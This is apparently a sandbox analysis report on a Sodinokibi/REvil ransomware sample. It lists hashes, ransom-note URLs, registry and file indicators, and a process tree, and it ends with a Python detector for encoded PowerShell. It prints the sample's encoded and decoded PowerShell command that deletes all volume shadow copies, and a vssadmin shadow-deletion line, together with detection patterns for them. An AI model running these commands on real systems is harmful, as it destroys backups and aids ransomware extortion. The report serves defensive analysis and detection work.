Analysis
- max time kernel: 45s
- max time network: 57s
- platform: windows7_x64
- resource: win7v200722
- submitted: 20-08-2020 13:04
Static task: static1
Behavioral task: behavioral1
- Sample: d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
- Resource: win7v200722
Behavioral task: behavioral2
- Sample: d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
- Resource: win10v200722
General
- Target: d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll
- Size: 116KB
- MD5: 946a25739c934f91f795e002a9f77bda
- SHA1: 48fa5f0d87d162f8ae67e01d7ee309ae8fa976cf
- SHA256: d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8
- SHA512: 07e6ec47cfbb44975ff7e69973c8154d8f26af1acb26e62b40e0003943953ab87b15a222b14bae7bfb74849f9aff36d727372cff3c3954418db7d28e9119ae69
Malware Config
- Extracted from: C:\evlj584f-readme.txt (the ransom note the sample drops)
- Family: sodinokibi
- URLs:
  http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/CFD95459DCCAE4E1
  http://decryptor.cc/CFD95459DCCAE4E1
The note points the victim at a Tor hidden service and a clearnet mirror (decryptor.cc); both carry the same victim-specific path component, CFD95459DCCAE4E1. The note's own file name (evlj584f-readme.txt) is the random extension the sample appends to encrypted files, which is why the same token recurs in the dropped-file list below.
Signatures

Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)
Modifies service (2 TTPs, 5 IoCs)
Process: vssvc.exe
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5}
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
These keys are written by the Volume Shadow Copy service (vssvc.exe, PID 1904), not by the sample's own process; they are the diagnostic keys VSS creates for its writers when the service is started, which is consistent with the service being brought up to serve the shadow-copy deletion request issued from PowerShell (see the process tree).
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Process: rundll32.exe
- Set value (str): \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2lf42u968782.bmp"
Drops file in Program Files directory (38 IoCs)
Process: rundll32.exe
- File opened for modification: \??\c:\program files\DismountUnblock.xsl
- File created: \??\c:\program files\microsoft sql server compact edition\evlj584f-readme.txt
- File opened for modification: \??\c:\program files\SubmitDisconnect.contact
- File opened for modification: \??\c:\program files\UseEdit.odt
- File opened for modification: \??\c:\program files\MountRestore.xltm
- File opened for modification: \??\c:\program files\PopFormat.midi
- File opened for modification: \??\c:\program files\RegisterConfirm.csv
- File opened for modification: \??\c:\program files\UndoInstall.xhtml
- File opened for modification: \??\c:\program files\ClearEdit.xls
- File opened for modification: \??\c:\program files\CompleteDebug.wmv
- File opened for modification: \??\c:\program files\DebugSuspend.mp2v
- File opened for modification: \??\c:\program files\JoinOpen.xla
- File opened for modification: \??\c:\program files\TraceStep.tmp
- File created: \??\c:\program files\evlj584f-readme.txt
- File opened for modification: \??\c:\program files\ClearInvoke.m1v
- File opened for modification: \??\c:\program files\ConvertRead.pps
- File opened for modification: \??\c:\program files\ResolveBlock.jpg
- File opened for modification: \??\c:\program files\ExportUnblock.xml
- File opened for modification: \??\c:\program files\UnprotectPop.crw
- File opened for modification: \??\c:\program files\UnpublishSuspend.kix
- File opened for modification: \??\c:\program files\UseRedo.ogg
- File created: \??\c:\program files (x86)\evlj584f-readme.txt
- File opened for modification: \??\c:\program files\GetGrant.pptx
- File opened for modification: \??\c:\program files\UnregisterLimit.mp2
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\evlj584f-readme.txt
- File opened for modification: \??\c:\program files\CheckpointWait.mp4v
- File opened for modification: \??\c:\program files\GroupConvertTo.tiff
- File opened for modification: \??\c:\program files\ResolveReceive.inf
- File opened for modification: \??\c:\program files\SaveInvoke.mhtml
- File opened for modification: \??\c:\program files\SyncSplit.mid
- File opened for modification: \??\c:\program files\UndoConfirm.tif
- File created: \??\c:\program files\microsoft sql server compact edition\v3.5\evlj584f-readme.txt
- File opened for modification: \??\c:\program files\ConnectOpen.mpv2
- File opened for modification: \??\c:\program files\MeasureMove.wmf
- File opened for modification: \??\c:\program files\RestoreReset.odp
- File opened for modification: \??\c:\program files\ResumeCompress.jtx
- File opened for modification: \??\c:\program files\StartGrant.txt
- File opened for modification: \??\c:\program files\UnprotectSuspend.vbe
The "opened for modification" entries are the sandbox's decoy documents being encrypted in place; the "created" entries are copies of the ransom note written into each directory the sample touches.
Suspicious behavior: EnumeratesProcesses (3 IoCs)
- PID 1596 rundll32.exe
- PID 756 powershell.exe (2 events)
Suspicious use of AdjustPrivilegeToken (6 IoCs)
- Token: SeDebugPrivilege, PID 1596 rundll32.exe
- Token: SeDebugPrivilege, PID 756 powershell.exe
- Token: SeBackupPrivilege, PID 1904 vssvc.exe
- Token: SeRestorePrivilege, PID 1904 vssvc.exe
- Token: SeAuditPrivilege, PID 1904 vssvc.exe
- Token: SeTakeOwnershipPrivilege, PID 1596 rundll32.exe
Only the two entries for PID 1596 are the sample's own doing: SeTakeOwnershipPrivilege lets it take over files it would otherwise be denied write access to, and SeDebugPrivilege lets it open other processes. The vssvc.exe privileges are the service's normal backup/restore set, and the powershell.exe entry is PowerShell's standard startup behaviour.
Suspicious use of WriteProcessMemory (11 IoCs)
- PID 112 rundll32.exe wrote to memory of PID 1596 rundll32.exe (7 events)
- PID 1596 rundll32.exe wrote to memory of PID 756 powershell.exe (4 events)
Processes

C:\Windows\system32\rundll32.exe (PID 112)
  Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#1
  - Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\rundll32.exe (PID 1596)
    Command line: rundll32.exe C:\Users\Admin\AppData\Local\Temp\d0fb6f4c608994c787f15ee3b5cc1297180687522ade080c07a708e55ce23de8.bin.exe.dll,#1
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 756)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Decoded -EncodedCommand (base64 over UTF-16LE): Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\wbem\unsecapp.exe (PID 1688)
  Command line: C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\system32\vssvc.exe (PID 1904)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken

Reading the tree: the sample is a DLL and is invoked by ordinal (",#1" calls export 1). The 64-bit rundll32.exe (PID 112) re-executes itself from SysWOW64 with the identical command line, which is what rundll32 does when handed a 32-bit DLL; the seven WriteProcessMemory events from 112 to 1596 are the parent setting up that child and are not evidence of code injection by the sample. All ransomware behaviour (wallpaper, file encryption, note drops, privilege changes) is attributed to the SysWOW64 instance, PID 1596. That process spawns PowerShell with an encoded command whose only purpose is to enumerate and delete every volume shadow copy through WMI, removing the easiest recovery path before or while files are encrypted. unsecapp.exe (WMI's callback sink) and vssvc.exe sit at the top level of the tree rather than under the sample: they are started by the system in response to that WMI call, which is why the VSS service, not the sample, accounts for the "Modifies service" registry activity.
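The shadow-copy deletion above is hidden behind an -EncodedCommand argument, so a detection that only string-matches the raw command line misses it. The following is an added example (not part of this sandbox report or of the sample it describes) that decodes the argument the way powershell.exe does, base64 over UTF-16LE, and then evaluates the effective script for shadow-copy deletion by WMI, wmic or vssadmin. The command lines it scans are constructed: the first is the PID 756 invocation copied from the process tree, the other two are invented for contrast. The prefix-matching of the flag reflects that powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), which attackers exploit to dodge exact-string rules.

```python
"""Decode PowerShell -EncodedCommand arguments and flag shadow-copy deletion.

Added example, not part of the sandbox report or of the sample it describes.
SAMPLE_CMDLINES is constructed: the first entry is the powershell.exe
invocation from the report's process tree, the other two are invented.
"""
import base64
import re
from typing import Dict, Optional, Union

# Copied verbatim from the report (PID 756 command line).
ENCODED_FROM_REPORT = (
    "RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
    "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8A"
    "LgBEAGUAbABlAHQAZQAoACkAOwB9AA=="
)

SAMPLE_CMDLINES = [
    # From the report's process tree.
    "powershell -e " + ENCODED_FROM_REPORT,
    # Constructed benign encoded command, built the same way (UTF-16LE, then base64).
    "powershell.exe -NoProfile -EncodedCommand "
    + base64.b64encode("Get-Date".encode("utf-16-le")).decode("ascii"),
    # Constructed unencoded variant of the same technique through vssadmin.
    "cmd.exe /c vssadmin.exe delete shadows /all /quiet",
]


def is_encoded_command_flag(token: str) -> bool:
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand
    (-e, -ec, -enc, -encodedcommand, ...), so match on prefix, not on one spelling."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script behind -EncodedCommand, or None when the command line
    has no such flag or its argument is not valid base64 / UTF-16LE.

    The argument is base64 over UTF-16LE text; the zero high bytes of ASCII
    characters are what produce the 'A' in every other position of the
    encoded string in the report."""
    tokens = cmdline.split()
    for flag, value in zip(tokens, tokens[1:]):
        if not is_encoded_command_flag(flag):
            continue
        try:
            raw = base64.b64decode(value.strip("\"'"), validate=True)
            return raw.decode("utf-16-le")
        except ValueError:  # covers binascii.Error and UnicodeDecodeError
            return None
    return None


SHADOW_COPY_PATTERNS = [
    # WMI from PowerShell: Get-WmiObject / Get-CimInstance Win32_ShadowCopy ... .Delete()
    re.compile(r"win32_shadowcopy[\s\S]*?\.delete\s*\(", re.IGNORECASE),
    # wmic shadowcopy delete
    re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.IGNORECASE),
    # vssadmin delete shadows
    re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.IGNORECASE),
]


def deletes_shadow_copies(script: str) -> bool:
    """True if the (decoded) script removes volume shadow copies by any of the
    three common routes."""
    return any(p.search(script) for p in SHADOW_COPY_PATTERNS)


def triage(cmdline: str) -> Dict[str, Union[bool, str]]:
    """Decode the command line if it is encoded, then evaluate the effective script."""
    decoded = decode_encoded_command(cmdline)
    effective = cmdline if decoded is None else decoded
    return {
        "encoded": decoded is not None,
        "script": effective,
        "shadow_copy_deletion": deletes_shadow_copies(effective),
    }


if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        result = triage(line)
        print(f"encoded={result['encoded']} "
              f"shadow_copy_deletion={result['shadow_copy_deletion']} "
              f"script={result['script']}")
```

Run as-is it prints the three verdicts; the report's command decodes to Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} and is flagged, the constructed Get-Date is decoded but not flagged, and the vssadmin line is flagged without decoding. In a detection pipeline, feed triage() the CommandLine field of Sysmon event 1 or Security event 4688 (with command-line auditing enabled) and alert on shadow_copy_deletion regardless of whether the command was encoded; the decoding step is what closes the gap that the encoded form is designed to exploit.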